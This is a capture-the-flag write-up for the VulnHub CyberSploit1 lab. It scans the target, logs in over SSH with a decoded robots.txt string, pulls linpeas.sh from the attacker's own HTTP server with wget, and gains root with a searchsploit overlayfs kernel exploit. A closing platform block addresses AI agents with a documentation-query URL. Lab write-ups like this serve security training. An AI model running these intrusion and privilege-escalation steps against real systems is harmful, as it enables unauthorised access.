> For the complete documentation index, see [llms.txt](https://psdon.gitbook.io/hackworld/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://psdon.gitbook.io/hackworld/writeup/vulnhub/linux/cybersploit1.md). # CyberSploit1 ## nmap ``` (base) [psdon@arch CyberSploit1]$ mkdir nmap (base) [psdon@arch CyberSploit1]$ sudo rustscan -a 192.168.217.92 --ulimit 5000 -t 2000 -- -T4 -A -oA nmap/all-ports-service-scan .----. .-. .-. .----..---. .----. .---. .--. .-. .-. | {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| | | .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ | `-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-' The Modern Day Port Scanner. ________________________________________ : https://discord.gg/GFrQsGy : : https://github.com/RustScan/RustScan : -------------------------------------- Real hackers hack time ⌛ [~] The config file is expected to be at "/root/.rustscan.toml" [~] Automatically increasing ulimit value to 5000. Open 192.168.217.92:22 Open 192.168.217.92:80 ``` A web server on port 80 is open
Let's checked the source code of the page, and we can find a possible username on there.
Let's also checked the `robots.txt` and as you can see, we have found a base64 encoded string
We can decode it by executing the following command ``` (base) [psdon@arch CyberSploit1]$ echo Y3liZXJzcGxvaXR7eW91dHViZS5jb20vYy9jeWJlcnNwbG9pdH0= | base64 --decode cybersploit{youtube.com/c/cybersploit} ``` ## Exploitation Let's try to log in using the username of `itsskv` and use the decoded string as a password ``` (base) [psdon@arch nikto]$ ssh itsskv@192.168.217.92 This key is not known by any other names Are you sure you want to continue connecting (yes/no/[fingerprint])? yes Warning: Permanently added '192.168.217.92' (ECDSA) to the list of known hosts. itsskv@192.168.217.92's password: cybersploit{youtube.com/c/cybersploit} itsskv@cybersploit-CTF:~$ ``` Looks like we have successfully gained an initial shell. Sweet :D ## Post Exploitation First, let's transfer `linpeas.sh` from our machine to the target machine ``` (base) [psdon@arch CyberSploit1]$ cd /opt/peass/linPEAS/ (base) [psdon@arch linPEAS]$ ls builder images linpeas.sh README.md (base) [psdon@arch linPEAS]$ sudo python -m http.server 80 Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ... ``` You can find the machine IP address by executing the following. ``` (base) [psdon@arch CyberSploit1]$ ip a | grep tun 5: tun0: mtu 1500 qdisc fq_codel state UNKNOWN group default qle n 500 inet 192.168.49.217/24 scope global tun0 (base) [psdon@arch CyberSploit1]$ ``` Then transfer the script using `wget` ``` itsskv@cybersploit-CTF:~$ wget http://192.168.49.217/linpeas.sh --2021-08-27 02:16:13-- http://192.168.49.217/linpeas.sh Connecting to 192.168.49.217:80... connected. HTTP request sent, awaiting response... 200 OK Length: 458110 (447K) [application/x-sh] Saving to: `linpeas.sh' 100%[================================================================>] 4,58,110 147K/s in 3.0s 2021-08-27 02:16:17 (147 KB/s) - `linpeas.sh' saved [458110/458110] itsskv@cybersploit-CTF:~$ chmod +x linpeas.sh ``` And now we can run `linpeas.sh` ``` itsskv@cybersploit-CTF:~$ ./linpeas.sh ▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄ ▄▄▄▄ ▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄ ▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄ ▄▄▄▄▄▄ ▄ ▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄ ▄▄▄▄ ▄▄ ▄▄▄ ▄▄▄▄▄ ▄▄▄ ▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄ ▄ ▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄ ▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄ ▄▄▄▄▄ ▄▄▄▄▄ ▄▄▄▄▄▄ ▄▄▄▄ ▄▄▄▄ ▄▄▄▄▄ ▄▄▄▄▄ ▄ ▄▄ ▄▄▄▄▄ ▄▄▄▄▄ ▄▄▄▄▄▄▄ ▄▄▄▄▄ ▄▄▄▄▄ ▄▄▄▄▄▄ ▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄ ▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▀▀▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▀▀▀▀▀▀ ▀▀▀▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▀▀ ▀▀▀▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▀▀▀ /---------------------------------------------------------------------------\ | Do you like PEASS? | |---------------------------------------------------------------------------| | Become a Patreon : https://www.patreon.com/peass | | Follow on Twitter : @carlospolopm | | Respect on HTB : SirBroccoli & makikvues | |---------------------------------------------------------------------------| | Thank you! | \---------------------------------------------------------------------------/ linpeas-ng by carlospolop ``` Right of the bat, you can see the version of the Linux Kernel it is running.
We can check this Linux Kernel version with `searchsploit` and I found out it is vulnerable to **overlayf** exploit.
## Privilege Escalation Let's mirror the exploit to our current working directory, and copy the content of the file to the clipboard
``` xclip -selection clipboard -i < 37292.c ``` And paste it to the target machine ``` nano e.c ```
We can compile the C source code using `gcc` binary installed in the target machine. And right after running the exploit, we got root in the target machine.
Thanks, and enjoy! :D --- # Agent Instructions This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com. ## Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://psdon.gitbook.io/hackworld/writeup/vulnhub/linux/cybersploit1.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.